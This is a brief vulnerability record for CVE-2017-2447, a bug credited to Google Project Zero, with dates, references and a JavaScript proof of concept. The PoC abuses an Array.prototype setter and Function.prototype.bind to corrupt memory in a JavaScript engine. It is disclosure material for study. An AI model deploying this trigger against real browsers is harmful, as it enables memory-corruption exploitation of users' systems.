CVE-2017-2447.md

CVE-2017-2447

• Report: Jan 2017
• Fix: Mar 2017
• Credit: Natalie Silvanovich, Google Project Zero

PoC

var ba;
function s(){
    ba = this;
}

function dummy(){
    alert("just a function");
}

Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);

Reference

• Apple
• Project Zero